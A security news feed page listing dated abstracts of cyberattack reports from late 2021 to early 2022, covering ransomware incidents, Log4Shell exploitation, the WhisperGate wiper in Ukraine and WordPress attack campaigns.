Threat actors planted a backdoor into multiple WordPress themes and plugins after compromising the website of their developer. In a classic supply chain attack, threat actors planted a backdoor in dozens of WordPress plugins and themes hosted on a developer's...Security Affairs
January 24, 2022
Earth Karkaddan Delivers CapraRAT, CrimsonRAT, and ObliqueRAT via Spear-Phishing Campaigns Full Text
Abstract
Typically, the Earth Karkaddan hacker group's arrival methods include the use of spear-phishing emails and a USB worm that would then drop and execute a remote access trojan (RAT).Trend Micro
January 24, 2022
China accused of hijacking Australia Prime Minister Scott Morrison’s WeChat account Full Text
Abstract
An Australian member of parliament has accused the Chinese government of foreign interference after Prime Minister Scott Morrison's account on WeChat was hijacked recently.ZDNet
January 22, 2022
Researchers find similarities between NotPetya, attacks on Ukrainian government websites Full Text
Abstract
The malware that wiped dozens of government computer systems in Ukraine starting on Jan. 13 shares some strategic similarities to the NotPetya wiper that was used to attack Ukraine in 2017.Cyberscoop
January 22, 2022
Experts Find Strategic Similarities b/w NotPetya and WhisperGate Attacks on Ukraine Full Text
Abstract
Latest analysis into the wiper malware that targeted dozens of Ukrainian agencies earlier this month has revealed "strategic similarities" to NotPetya malware that was unleashed against the country's infrastructure and elsewhere in 2017. The malware, dubbed WhisperGate , was discovered by Microsoft last week, which said it observed the destructive cyber campaign targeting government, non-profit, and information technology entities in the nation, attributing the intrusions to an emerging threat cluster codenamed "DEV-0586." "While WhisperGate has some strategic similarities to the notorious NotPetya wiper that attacked Ukranian entities in 2017, including masquerading as ransomware and targeting and destroying the master boot record (MBR) instead of encrypting it, it notably has more components designed to inflict additional damage," Cisco Talos said in a report detailing its response efforts. Stating that stolen credentials were likely used iThe Hacker News
January 22, 2022
Disruptive Attacks in Ukraine Likely Linked to Escalating Tensions Full Text
Abstract
The threat actors attempted to misdirect attribution using inauthentic metadata and used publicly available crimeware services and code to minimize the amount of custom code involved in the attack.Secure Works
January 21, 2022
Contextualizing Last Week’s Malicious Cyber Activities Against Ukrainian Government Websites and Systems Full Text
Abstract
The events reflect the complexity of how cyber operations can function diversely across and even within specific conflicts.Lawfare
January 20, 2022
New Log4j attacks target SolarWinds, ZyXEL devices Full Text
Abstract
Cybercriminals looking to capitalize on the Log4Shell vulnerability are attacking devices from SolarWinds and ZyXEL that are known to have used the Log4j library inside their software.The Record
January 20, 2022
Red Cross hit by a sophisticated cyberattack Full Text
Abstract
A cyberattack on a Red Cross contactor resulted in the theft of personal data for more than 515,000 highly vulnerable people A cyberattack on a Red Cross contactor resulted in the theft of personal data for more than 515,000 highly vulnerable people...Security Affairs
January 18, 2022
Ukraine: Recent Cyber Attacks Part of Wider Plot to Sabotage Critical Infrastructure Full Text
Abstract
The coordinated cyberattacks targeting Ukrainian government websites and the deployment of a data-wiper malware called WhisperGate on select government systems are part of a broader wave of malicious activities aimed at sabotaging critical infrastructure in the country. The Secret Service of Ukraine on Monday confirmed that the two incidents are related, adding the breaches also exploited the recently disclosed Log4j vulnerabilities to gain access to some of the compromised systems. "The attack used vulnerabilities in the site's content management systems (October CMS) and Log4j, as well as compromised accounts of employees of the development company," the SSU said , corroborating prior disclosure from the Ukraine CERT team . The disclosure comes days after Microsoft warned of a malware operation aimed at government, non-profit, and information technology entities in Ukraine, attributing the attacks to a threat cluster codenamed "DEV-0586." "The Hacker News
January 18, 2022
Destructive MBR Wiper Targets Ukrainian Organizations Full Text
Abstract
The attacks started on January 13 - around the same time when more than 70 government websites were defaced by gangs reportedly linked to Russian secret services.Cyware Alerts - Hacker News
January 17, 2022
UK Umbrella Company Parasol Group Confirms Disruptive Cyberattack Full Text
Abstract
As reported on Friday, the umbrella company's MyParasol portal, where timesheets are submitted, was not accessible due to an outage starting on January 12, impacting the processing of payroll.The Register
January 17, 2022
Experts warn of attacks using a new Linux variant of SFile ransomware Full Text
Abstract
The operators of the SFile ransomware (aka Escal) have developed a Linux version of their malware to expand their operations. SFile ransomware (aka Escal), has been active since 2020, it was observed targeting only Windows systems. Some variants...Security Affairs
January 17, 2022
Cyber espionage campaign targets renewable energy companies Full Text
Abstract
A large-scale cyber-espionage campaign targeting primarily renewable energy and industrial technology organizations have been discovered to be active since at least 2019, targeting over fifteen entities worldwide.BleepingComputer
January 16, 2022
Microsoft: Fake ransomware targets Ukraine in data-wiping attacks Full Text
Abstract
Microsoft is warning of destructive data-wiping malware disguised as ransomware being used in attacks against multiple organizations in Ukraine.BleepingComputer
January 16, 2022
Microsoft spotted a destructive malware campaign targeting Ukraine Full Text
Abstract
Microsoft spotted a new destructive malware operation targeting government, non-profit, and IT entities in Ukraine. Microsoft spotted a destructive attack that targeted government, non-profit, and IT entities in Ukraine with a wiper disguised as ransomware....Security Affairs
January 16, 2022
A new wave of Qlocker ransomware attacks targets QNAP NAS devices Full Text
Abstract
QNAP NAS devices are under attack, experts warn of a new Qlocker ransomware campaign that hit devices worldwide. A new wave of Qlocker ransomware it targeting QNAP NAS devices worldwide, the new campaign started on January 6 and it drops ransom notes...Security Affairs
January 14, 2022
Ukrainian websites hit by cyberattack amid tensions with Russia Full Text
Abstract
Several Ukrainian government websites were hit by what officials called a "massive cyberattack" on Friday as hackers took control and posted messages warning Ukraine to "be afraid and expect worse."The Hill
January 14, 2022
Defense contractor Hensoldt confirms Lorenz ransomware attack Full Text
Abstract
Hensoldt, a multinational defense contractor headquartered in Germany, has confirmed that some of its UK subsidiary's systems were compromised in a ransomware attack.BleepingComputer
January 14, 2022
Multiple Ukrainian government websites hacked and defaced Full Text
Abstract
At least 15 websites belonging to various Ukrainian public institutions were compromised, defaced, and subsequently taken offline.BleepingComputer
January 13, 2022
New GootLoader Campaign Targets Accounting, Law Firms Full Text
Abstract
GootLoader hijacks WordPress sites to lure professionals to download malicious sample contract templates.Threatpost
January 13, 2022
Threat actors abuse public cloud services to spread multiple RATs Full Text
Abstract
Threat actors are actively abusing cloud services from Amazon and Microsoft to deliver RATs such as Nanocore, Netwire, and AsyncRAT. Threat actors are actively exploiting public cloud services from Amazon and Microsoft to spread RATs such as Nanocore, Netwire,...Security Affairs
January 11, 2022
FIN7 Mails Malicious USB Sticks to Drop Ransomware Full Text
Abstract
The FBI warned that attackers are impersonating Health & Human Services and/or Amazon to mail BadUSB-poisoned USB devices to targets in transportation, insurance & defense.Threatpost
January 11, 2022
Cosmetics company Clarins hit by data security incident, ‘may involve’ Singapore customers’ personal information Full Text
Abstract
The data accessed may have included customers’ personal information such as name, address, email, phone number, and Clarins loyalty program status, the cosmetics company added.Channel News Asia
January 10, 2022
Zloader Campaign Abuses Microsoft’s Security Checks Full Text
Abstract
The Malsmoke hacking group attacked over 2,100 victims worldwide in a new Zloader campaign by abusing a bug in Microsoft’s e-signature verification tool. Though it couldn't be confirmed, experts believe the group uses spear-phishing emails or pirated software resources to infect victims. Such ... Read MoreCyware Alerts - Hacker News
January 10, 2022
New ZLoader malware campaign hit more than 2000 victims across 111 countries Full Text
Abstract
A malware campaign spreads ZLoader malware by exploiting a Windows vulnerability that was fixed in 2013 but in 2014 Microsoft revised the fix. Experts from Check Point Research uncovered a new ZLoader malware campaign in early November 2021. The malware...Security Affairs
January 06, 2022
North Korean Hackers Start New Year with Attacks on Russian Foreign Ministry Full Text
Abstract
A North Korean cyberespionage group named Konni has been linked to a series of targeted attacks aimed at the Russian Federation's Ministry of Foreign Affairs (MID) with New Year lures to compromise Windows systems with malware. "This activity cluster demonstrates the patient and persistent nature of advanced actors in waging multi-phased campaigns against perceived high-value networks," researchers from Lumen Technologies' Black Lotus Labs said in an analysis shared with The Hacker News. The Konni group's tactics, techniques, and procedures (TTPs) are known to overlap with threat actors belonging to the broader Kimsuky umbrella, which is also tracked by the cybersecurity community under the monikers Velvet Chollima, ITG16, Black Banshee, and Thallium. The most recent attacks involved the actor gaining access to the target networks through stolen credentials, exploiting the foothold to load malware for intelligence gathering purposes, with early signs of tThe Hacker News
January 05, 2022
Microsoft code-sign check bypassed to drop Zloader malware Full Text
Abstract
A new Zloader campaign exploits Microsoft's e-signature code verification to steal user credentials from over two thousand victims in 111 countries.BleepingComputer
January 04, 2022
Microsoft Warns of Continued Attacks Exploiting Apache Log4j Vulnerabilities Full Text
Abstract
Microsoft is warning of continuing attempts by nation-state adversaries and commodity attackers to take advantage of security vulnerabilities uncovered in the Log4j open-source logging framework to deploy malware on vulnerable systems. "Exploitation attempts and testing have remained high during the last weeks of December," Microsoft Threat Intelligence Center (MSTIC) said in revised guidance published earlier this week. "We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks." Publicly disclosed by the Apache Software Foundation on December 10, 2021, the remote code execution (RCE) vulnerability in Apache Log4j 2, aka Log4Shell , has emerged as a new attack vector for widespread exploitation by a variety of threat actors. In the subsequent weeks, four more weaknesses in the utility have come to light — CVE-2021-45046 , CVE-2021-45105 ,The Hacker News
January 04, 2022
Hillicon Valley — Twitter’s Greene ban boosts GOP attacks Full Text
Abstract
Today is Tuesday. Welcome to Hillicon Valley, detailing all you need to know about tech and cyber news from Capitol Hill to Silicon Valley. Subscribe here: thehill.com/newsletter-signup.The Hill
January 4, 2022
Microsoft Sees Rampant Log4j Exploit Attempts, Testing Full Text
Abstract
Microsoft says it’s only going to get worse: It’s seen state-sponsored and cyber-criminal attackers probing systems for the Log4Shell flaw through the end of December.Threatpost
January 3, 2022
MSBuild Abused for Execution of Cobalt Strike Beacon Full Text
Abstract
Researchers uncovered two malicious campaigns that abuse MSBuild to drop Cobalt Strike on targeted machines. The attackers first gain access to the target environment with an RDP account. As per experts, the Windows Defender Application Control (WDAC) policy can prevent these kinds of attacks.Cyware Alerts - Hacker News
January 3, 2022
Israeli Media Outlets hacked on the anniversary of Soleimani killing Full Text
Abstract
Threat actors hacked the website of Jerusalem Post and the Twitter account of Maariv outlet on Soleimani killing anniversary. Threat actors have taken over the website of the English-language Jerusalem Post and the Twitter account of Maariv daily...Security Affairs
January 2, 2022
Exclusive: NASA Director Twitter account hacked by Powerful Greek Army Full Text
Abstract
The Twitter account of NASA Director Parimal Kopardekar (@nasapk) was hacked by the Powerful Greek Army group. The Twitter account of the NASA Director and Sr Technologist for Air Transporation Sytem Mr. Parimal Kopardekar (@nasapk) was hacked by the Powerful...Security Affairs
December 29, 2021
Fintech firm hit by Log4j hack refuses to pay $5 million ransom Full Text
Abstract
One of the largest Vietnamese crypto trading platforms, ONUS, recently suffered a cyber attack on its payment system running a vulnerable Log4j version. Soon enough, threat actors approached ONUS to extort $5 million and threatened to publish customer data should ONUS refuse to comply.BleepingComputer
December 28, 2021
Shutterfly hit by a Conti ransomware attack Full Text
Abstract
Shutterfly, an online platform for photography and personalized products, has been affected by a ransomware attack. Shutterfly, is American photography, photography products, and image sharing company that owns multiple brands such as BorrowLenses,...Security Affairs
December 27, 2021
QNAP NAS devices hit in surge of ech0raix ransomware attacks Full Text
Abstract
Users of QNAP network-attached storage (NAS) devices are reporting attacks on their systems with the eCh0raix ransomware, also known as QNAPCrypt.BleepingComputer
December 27, 2021
Shutterfly hit by ransomware attack Full Text
Abstract
Photography company Shutterfly announced this week that it had been hit by a ransomware attack that had impacted some services, making it the latest in a string of companies to be targeted by hackers looking for a payout.The Hill
December 27, 2021
A new wave of ech0raix ransomware attacks targets QNAP NAS devices Full Text
Abstract
A new wave of ech0raix ransomware attacks is targeting QNAP network-attached storage (NAS) devices. The threat actors behind the ech0raix ransomware are targeting NAP network-attached storage (NAS) devices. Users reported numerous compromises of their...Security Affairs
December 27, 2021
Experts monitor ongoing attacks using exploits for Log4j library flaws Full Text
Abstract
Researchers from DrWeb monitored attacks leveraging exploits for vulnerabilities in the Apache Log4j library Researchers from DrWeb monitored attacks leveraging exploits for vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE2021-4104, and CVE-2021-42550)...Security Affairs
December 26, 2021
French IT services provider Inetum hit by BlackCat ransomware attack Full Text
Abstract
The IT services company Inetum Group was hit by a ransomware attack a few days before the Christmas holiday. French IT services company Inetum Group was hit by a ransomware attack a few days before the Christmas holiday, but according to the company...Security Affairs
December 24, 2021
Global IT services provider Inetum hit by ransomware attack Full Text
Abstract
Less than a week before the Christmas holiday, French IT services company Inetum Group was hit by a ransomware attack that had a limited impact on the business and its customers.BleepingComputer
December 23, 2021
Watch out for Christmas 2021 credential stuffing attacks! Full Text
Abstract
A study by Arkose Labs has revealed that there were over two billion credential stuffing attacks during the last 12 months, growing exponentially during the period from October 2020 to September 2021.Help Net Security
December 21, 2021
Log4j Vulnerability Aftermath Full Text
Abstract
Uptycs researchers have observed attacks related to miners, DDOS malware and some variants of ransomware actively leveraging LogforShell flaw in log4j. Last week the Log4j vulnerability turned the internet upside down. The impact of the vulnerability...Security Affairs
December 20, 2021
Decentralized Finance Protocol Grim Finance Suffers 5x Reentrancy Attack Full Text
Abstract
The attacker exploited the protocol’s vault contract through five reentrancy loops, which allowed them to fake five additional deposits into a vault while the platform is processing the first deposit.Coin Telegraph
December 20, 2021
Belgian defense ministry hacked by attackers exploiting Apache vulnerability Full Text
Abstract
Belgium’s Ministry of Defense was recently hacked by attackers exploiting the massive vulnerability in Apache logging library log4j that has become a worldwide security concern, according to multiple reports.The Hill
December 20, 2021
Belgian defense ministry hit by cyberattack exploiting Log4Shell bug Full Text
Abstract
The Belgian defense ministry was hit by a cyber attack, it seems that threat actors exploited the Log4Shell vulnerability. The Belgian defense ministry confirmed it was hit by a cyberattack, it seems that threat actors exploited the Log4Shell vulnerability....Security Affairs
December 20, 2021
Kronos Attack Impacts Payroll Data of 150,000 Sainsbury’s Employees Full Text
Abstract
The supermarket chain is understood to have lost about a week's worth of data for its 150,000 employees in the United Kingdom. But it said they would be paid before Christmas.BBC
December 17, 2021
Logistics giant warns of BEC emails following ransomware attack Full Text
Abstract
Hellmann Worldwide is warning customers of an increase in fraudulent calls and emails regarding payment transfer and bank account changes after a recent ransomware attack.BleepingComputer
December 17, 2021
PseudoManuscrypt, a mysterious massive cyber espionage campaign Full Text
Abstract
Tens of thousands of devices worldwide, including many industrial control systems (ICS), have been hit by the PseudoManuscrypt spyware. Kaspersky researchers reported that tens of thousands of devices belonging to industrial and government organizations...Security Affairs
December 16, 2021
‘PseudoManuscrypt’ Mass Spyware Campaign Targets 35K Systems Full Text
Abstract
It’s similar to Lazarus’s Manuscrypt malware, but the new spyware is splattering itself onto government organizations and ICS in a non-Lazarus-like, untargeted wave of attacks.Threatpost
December 16, 2021
Log4j attackers switch to injecting Monero miners via RMI Full Text
Abstract
Some threat actors exploiting the Apache Log4j vulnerability have switched from LDAP callback URLs to RMI or even used both in a single request for maximum chances of success.BleepingComputer
December 16, 2021
More Details on Log4Shell Attacks Full Text
Abstract
A few days back, we got to know that threat actors are abusing a critical vulnerability—Log4Shell—in Log4j and propagating malware. Now, the attacks have grown more severe as new details emerge.Cyware Alerts - Hacker News
December 16, 2021
McMenamins breweries hit by a Conti ransomware attack Full Text
Abstract
Portland brewery and hotel chain McMenamins suffered a Conti ransomware attack over the weekend that disrupted the company's operations.BleepingComputer
December 16, 2021
Portland-based Hotel and Brewpub Chain Suffers Cyberattack Likely Impacting Employee Data Full Text
Abstract
Hotel and brewpub chain McMenamins was hit with a ransomware attack that may have compromised employees' personal information, but no customer payment information appears to have been impacted.KGW
December 14, 2021
Telecom operators targeted in recent espionage hacking campaign Full Text
Abstract
Researchers have spotted a new espionage campaign targeting telecommunication and IT service providers in the Middle East and Asia.BleepingComputer
December 14, 2021
400 Banks’ Customers Targeted with Anubis Trojan Full Text
Abstract
The new campaign masqueraded as an Orange Telecom account management app to deliver the latest iteration of Anubis banking malware.Threatpost
December 14, 2021
Human resource management group hit by ransomware attack Full Text
Abstract
Ultimate Kronos Group (UKG), a human resources management provider, was hit by a ransomware attack earlier this week, the company confirmed.The Hill
December 14, 2021
Virginia General Assembly’s IT unit hit by ransomware attack Full Text
Abstract
The information technology unit for Virginia’s General Assembly has been hit by a ransomware attack, which barred legislators and staff from accessing the system that handles bills.The Hill
December 10, 2021
Over 1.6 Million WordPress Sites Targeted in Couple of Days with Attacks on Plugins and Themes Full Text
Abstract
Wordfence researchers spotted a massive wave of attacks in the days that are targeting over 1.6 million WordPress sites from 16,000 IPs via four different plugins and several Epsilon Framework themes.Security Affairs
December 10, 2021
1.6 Million WordPress Sites Under Cyberattack From Over 16,000 IP Addresses Full Text
Abstract
As many as 1.6 million WordPress sites have been targeted by an active large-scale attack campaign originating from 16,000 IP addresses by exploiting weaknesses in four plugins and 15 Epsilon Framework themes. WordPress security company Wordfence, which disclosed details of the attacks, said Thursday it had detected and blocked more than 13.7 million attacks aimed at the plugins and themes in a period of 36 hours with the goal of taking over the websites and carrying out malicious actions. The plugins in question are Kiwi Social Share (<= 2.0.10), WordPress Automatic (<= 3.53.2), Pinterest Automatic (<= 4.14.3), and PublishPress Capabilities (<= 2.3), some of which have been patched dating all the way back to November 2018. The impacted Epsilon Framework themes and their corresponding versions are as follow — Activello (<=1.4.1) Affluent (<1.1.0) Allegiant (<=1.2.5) Antreas (<=1.0.6) Bonkers (<=1.0.5) Brilliance (<=1.2.9) Illdy (<=2.1.6)The Hacker News
December 10, 2021
1.6 million WordPress sites targeted in the last couple of days Full Text
Abstract
Wordfence experts detected a massive wave of attacks in the last couple of days that targeted over 1.6 million WordPress sites. Wordfence researchers spotted a massive wave of attacks in the days that are targeting over 1.6 million...Security Affairs
December 10, 2021
Ransomware Attack at Payroll Provider Frontier Software Leaks Data on Australian Government Workers Full Text
Abstract
South Australia Treasurer Rob Lucas said on Friday that state government employee data has been exfiltrated as part of a ransomware attack on payroll provider Frontier Software.ZDNet
December 10, 2021
Massive attack against 1.6 million WordPress sites underway Full Text
Abstract
Wordfence analysts report having detected a massive wave of attacks in the last couple of days, originating from 16,000 IPs and targeting over 1.6 million WordPress sites.BleepingComputer
December 9, 2021
US Food Importer Firm Atalanta Suffers Ransomware Attack Full Text
Abstract
Upon becoming aware of the malicious activity, Atalanta engaged third-party specialists and began to remediate the situation, including conducting a forensic investigation into the incident.The Daily Swig
December 8, 2021
CS Energy foiled a ransomware attack Full Text
Abstract
A cyberattack hit CS Energy in Australia on Saturday, November 27, experts believe the attack was orchestrated by Chinese hackers. A ransomware cyberattack hit a major energy network operated by CS Energy, that attack could have had dramatic consequences...Security Affairs
December 07, 2021
US universities targeted by Office 365 phishing attacks Full Text
Abstract
US universities are being targeted in multiple phishing attacks designed to impersonate college login portals to steal valuable Office 365 credentials.BleepingComputer
December 07, 2021
Nordic Choice Hotels hit by Conti ransomware, no ransom demand yet Full Text
Abstract
Nordic Choice Hotels has now confirmed a cyber attack on its systems from the Conti ransomware group. Although there is no indication of card or payment information being affected, information pertaining to guest bookings was potentially leaked.BleepingComputer
December 6, 2021
330 SPAR stores close or switch to cash-only payments after a cyberattack Full Text
Abstract
A cyber attack hit the international supermarket franchise SPAR forcing 330 shops in North East England to shut down. A cyberattack hit the international supermarket franchise SPAR impacting the operations at 330 shops in North East England. Many...Security Affairs
December 6, 2021
DMEA Colorado electric utility hit by a disruptive cyberattack Full Text
Abstract
A ransomware attack hit an electric utility in Colorado causing a significant disruption and damage. The Delta-Montrose Electric Association (DMEA) is a local electric cooperative located in Colorado, it is part of Touchstone Energy Cooperatives. The...Security Affairs
December 03, 2021
Warning: Yet Another Zoho ManageEngine Product Found Under Active Attacks Full Text
Abstract
Enterprise software provider Zoho on Friday warned that a newly patched critical flaw in its Desktop Central and Desktop Central MSP is being actively exploited by malicious actors, marking the third security vulnerability in its products to be abused in the wild in a span of four months. The issue, assigned the identifier CVE-2021-44515 , is an authentication bypass vulnerability that could permit an adversary to circumvent authentication protections and execute arbitrary code in the Desktop Central MSP server. "If exploited, the attackers can gain unauthorized access to the product by sending a specially crafted request leading to remote code execution," Zoho cautioned in an advisory . "As we are noticing indications of exploitation of this vulnerability, we strongly advise customers to update their installations to the latest build as soon as possible." The company has also made available an Exploit Detection Tool that will help customers identify sigThe Hacker News
December 03, 2021
Researchers discover 14 new data-stealing web browser attacks Full Text
Abstract
IT security researchers from Ruhr-Universität Bochum (RUB) and the Niederrhein University of Applied Sciences have discovered 14 new types of 'XS-Leak' cross-site leak attacks against modern web browsers, including Google Chrome, Microsoft Edge, Safari, and Mozilla Firefox.BleepingComputer
December 1, 2021
Widespread ‘Smishing’ Campaign Defrauds Iranian Android Users Full Text
Abstract
Attackers use socially engineered SMS messages and malware to compromise tens of thousands of devices and drain user bank accounts.Threatpost
November 30, 2021
EwDoor Botnet Is Attacking AT&T Customers Full Text
Abstract
According to 360 Netlab, so far, EwDoor has undergone three versions of updates, and its main functions can be summarized into two main categories of DDoS attacks and backdoor.Netlab
November 30, 2021
New Attack Campaign Abuses Legitimate Remote Administrator Tools and Spreads via Fake Cryptocurrency Websites Full Text
Abstract
Trend Micro researchers discovered a new cryptocurrency-related campaign that abuses a legitimate Russian RAT known as Safib Assistant via a newer version of the malware called SpyAgent.Trend Micro
November 29, 2021
IKEA Hit by Email Reply-Chain Cyberattack Full Text
Abstract
IKEA, king of furniture-in-a-flat-box, warned employees on Friday that an ongoing cyberattack was using internal emails to malspam malicious links in active email threads.Threatpost
November 29, 2021
Panasonic confirmed that its network was illegally accessed by attackers Full Text
Abstract
Panasonic disclosed a security breach after threat actors gained access to its servers storing potentially sensitive information. Japanese electronics giant Panasonic disclosed a security breach after threat actors gained access to some servers of the company...Security Affairs
November 29, 2021
Biopharmaceutical firm Supernus Pharmaceuticals hit by Hive ransomware during an ongoing acquisition Full Text
Abstract
Biopharmaceutical company Supernus Pharmaceuticals discloses a ransomware attack, the Hive ransomware claims to have stolen company data. Biopharmaceutical company Supernus Pharmaceuticals confirmed it was the victim of a data breach after a ransomware...Security Affairs
November 27, 2021
IKEA hit by a cyber attack that uses stolen internal reply-chain emails Full Text
Abstract
Threat actors are targeting IKEA employees in an internal phishing campaign leveraging stolen reply-chain emails. According to BleepingComputer, threat actors are targeting IKEA employees in phishing attacks using stolen reply-chain emails. Once...Security Affairs
November 26, 2021
IKEA email systems hit by ongoing cyberattack Full Text
Abstract
IKEA is battling an ongoing cyberattack where threat actors are targeting employees in internal phishing attacks using stolen reply-chain emails.BleepingComputer
November 26, 2021
Marine services provider Swire Pacific Offshore (SPO) hit by Clop ransomware Full Text
Abstract
Marine services provider Swire Pacific Offshore (SPO) has suffered a Clop ransomware attack that resulted in the theft of company data. Clop ransomware hit Marine services provider Swire Pacific Offshore (SPO) and stole company data, but did not affected...Security Affairs
November 25, 2021
Printjack Attacks Can Turn Printers Into Zombies Full Text
Abstract
According to a team of Italian researchers, a large number of printers are publicly exposed on the internet, making it easy for attackers to send malicious data remotely.Cyware Alerts - Hacker News
November 24, 2021
Hackers exploit Microsoft MSHTML bug to steal Google, Instagram creds Full Text
Abstract
A newly discovered Iranian threat actor is stealing Google and Instagram credentials belonging to Farsi-speaking targets worldwide using a new PowerShell-based stealer dubbed PowerShortShell by security researchers at SafeBreach Labs.BleepingComputer
November 24, 2021
Ukraine arrests ‘Phoenix’ hackers behind Apple phishing attacks Full Text
Abstract
The Security Service of Ukraine (SSU) has arrested five members of the international 'Phoenix' hacking group who specialize in the remote hacking of mobile devices.BleepingComputer
November 23, 2021
TA406 Accelerates Attacks; Launch Several Campaigns Full Text
Abstract
Security researchers issued an in-depth report on malicious activities of TA406, an alleged North Korean group. Its attack volume has been rising since the beginning of this year. As the year commenced, its activities were ramped up as journalists, foreign policy experts, and non-governmental orga ... Read MoreCyware Alerts - Hacker News
November 23, 2021
Observing Attacks Against Hundreds of Exposed Services in Public Clouds Full Text
Abstract
Researchers found that 80% of the 320 honeypots were compromised within 24 hours and all of the honeypots were compromised within a week, with some of them facing hundreds of attacks.Palo Alto Networks
November 22, 2021
Biomanufacturing companies getting hit by hackers potentially linked to Russia Full Text
Abstract
Large biomanufacturing companies, including those that produce medications and vaccines tied to the COVID-19 pandemic, are being targeted by hackers potentially tied to Russia, researchers disclosed Monday.The Hill
November 22, 2021
Iran’s Mahan Air claims it has failed a cyber attack, hackers say the opposite Full Text
Abstract
Iranian airline Mahan Air was hit by a cyberattack on Sunday morning, the “Hooshyarane Vatan” hacker group claimed responsibility for the attack. Iranian private airline Mahan Air has foiled a cyber attack over the weekend, Iranian state media...Security Affairs
November 22, 2021
Iran’s Biggest Private Airline Faces Cyberattack Targeting its Internal Systems Full Text
Abstract
Mahan Air is Iran's main private airline and the second biggest after the national carrier Iran Air. It has been on the blacklist of Iranian companies targeted by US sanctions since 2011.Security Week
November 22, 2021
Hackers hit Iran’s Mahan airline, claim confidential data theft Full Text
Abstract
One of Iran's largest privately-owned airlines, Mahan Air, has announced a cybersecurity incident that has resulted in its website going offline and potentially data loss.BleepingComputer
November 20, 2021
Microsoft Exchange servers hacked in internal reply-chain attacks Full Text
Abstract
Threat actors are hacking Microsoft Exchange servers using ProxyShell and ProxyLogon exploits to distribute malware and bypass detection using stolen internal reply-chain emails.BleepingComputer
November 18, 2021
New Side Channel Attacks Re-Enable Serious DNS Cache Poisoning Attacks Full Text
Abstract
Researchers have demonstrated yet another variant of the SAD DNS cache poisoning attack that leaves about 38% of the domain name resolvers vulnerable, enabling attackers to redirect traffic originally destined to legitimate websites to a server under their control. "The attack allows an off-path attacker to inject a malicious DNS record into a DNS cache," University of California researchers Keyu Man, Xin'an Zhou, and Zhiyun Qian said . "SAD DNS attack allows an attacker to redirect any traffic (originally destined to a specific domain) to his own server and then become a man-in-the-middle (MITM) attacker, allowing eavesdropping and tampering of the communication." The latest flaw affects Linux kernels as well as popular DNS software, including BIND, Unbound, and dnsmasq running on top of Linux, but not when run on other operating systems FreeBSD or Windows. From Kaminsky Attack to SAD DNS DNS cache poisoning, also called DNS spoofing, is a technique iThe Hacker News
November 16, 2021
WordPress sites are being hacked in fake ransomware attacks Full Text
Abstract
A new wave of attacks starting late last week has hacked close to 300 WordPress sites to display fake encryption notices, trying to trick the site owners into paying 0.1 bitcoin for restoration.BleepingComputer
November 16, 2021
TikTok scammers tried hacking 125 targets that followed famous accounts, researchers find Full Text
Abstract
More than 125 people and businesses associated with large TikTok accounts based around the world were targeted as part of a recent phishing campaign, according to research published Tuesday.Cyberscoop
November 15, 2021
FBI Says Its System Was Exploited to Email Fake Cyberattack Alert Full Text
Abstract
The alert was mumbo jumbo, but it was indeed sent from the bureau’s email system, from the agency’s own internet address.Threatpost
November 15, 2021
Moses Staff hackers wreak havoc on Israeli orgs with ransomless encryptions Full Text
Abstract
A new hacker group named Moses Staff has recently claimed responsibility for numerous attacks against Israeli entities, which appear politically motivated as they do not make any ransom payment demands.BleepingComputer
November 14, 2021
Updated: Hundreds of thousands of fake warnings of cyberattacks sent from a hacked FBI email server Full Text
Abstract
Threat actors hacked email servers of the FBI to distribute spam email impersonating FBI warnings of fake cyberattacks. The email servers of the FBI were hacked to distribute spam email impersonating the Department of Homeland Security (DHS) warnings...Security Affairs
November 12, 2021
Microsoft warns of surge in HTML smuggling phishing attacks Full Text
Abstract
Microsoft has seen a surge in malware campaigns using HTML smuggling to distribute banking malware and remote access trojans (RAT).BleepingComputer
November 11, 2021
Back-to-Back PlayStation 5 Hacks Hit on the Same Day Full Text
Abstract
Cyberattackers stole PS5 root keys and exploited the kernel, revealing rampant insecurity in gaming devices.Threatpost
November 10, 2021
Stor-a-File hit by ransomware through SolarWinds Serv-U Full Text
Abstract
Stor-a-File, a U.K-based data capture and storage company, suffered a ransomware attack in August that exploited an unpatched instance of SolarWinds' Serv-U FTP software.The Register
November 10, 2021
PhoneSpy: Android spyware campaign targeting South Korean users Full Text
Abstract
An ongoing spyware campaign dubbed 'PhoneSpy' targets South Korean users via a range of lifestyle apps that nest in the device and silently exfiltrate data.BleepingComputer
November 09, 2021
Medical software firm urges password resets after ransomware attack Full Text
Abstract
Medatixx, a German medical software vendor whose products are used in over 21,000 health institutions, urges customers to change their application passwords following a ransomware attack that has severely impaired its entire operations.BleepingComputer
November 08, 2021
MediaMarkt hit by Hive ransomware, initial $240 million ransom Full Text
Abstract
Electronics retail giant MediaMarkt has suffered a Hive ransomware with an initial ransom demand of $240 million, causing IT systems to shut down and store operations to be disrupted in Netherlands and Germany.BleepingComputer
November 5, 2021
Ukraine Names Russian FSB Officers Involved in Gamaredon Cyberattacks Full Text
Abstract
Ukraine’s security service, the SBU, has revealed the identities of five individuals allegedly involved in cyberattacks attributed to a Russia-linked threat group named Gamaredon.Security Week
November 4, 2021
Labour hit by ‘cyber incident’ affecting members’ data Full Text
Abstract
The party said the impact of the incident, affecting an external supplier, was not yet clear and it was urgently investigating whether the data had been hacked. Police, cybersecurity specialists and regulators had been notified, it added.The Guardian
November 2, 2021
ATMs, Internal Network, and Mobile Apps Impacted by Destructive Attack at Pakistan’s State-owned Commercial Bank Full Text
Abstract
The incident impacted the bank’s backend systems and affected servers used to interlink the bank’s branches, the backend infrastructure controlling the bank’s ATM network, and the bank’s mobile apps.The Record
November 2, 2021
The Toronto Transit Commission (TTC) hit by a ransomware attack Full Text
Abstract
A ransomware attack hit the systems at the Toronto Transit Commission public transportation agency and disrupted its operations. The Toronto Transit Commission announced on Friday that its systems have been infected with ransomware, the attack began...Security Affairs
October 31, 2021
Minecraft Japanese gamers hit by Chaos ransomware using alt lists as lure Full Text
Abstract
Chaos Ransomware operators target gamers' Windows devices using Minecraft alt lists as a lure and promoting them on gaming forums. Minecraft is one of the most popular games in the world, it had more than 140 million monthly active players in August...Security Affairs
October 31, 2021
Graff multinational jeweller hit by Conti gang. Data of its rich clients are at risk, including Trump and Beckham Full Text
Abstract
Conti ransomware gang hit high society jeweller Graff and threatens to release private details of world leaders, actors and tycoons The latest attack of the Conti ransomware gang makes the headlines, the threat actors hit high society jeweller Graff...Security Affairs
October 30, 2021
REvil and SolarMarker Employ SEO Poisoning Attacks Full Text
Abstract
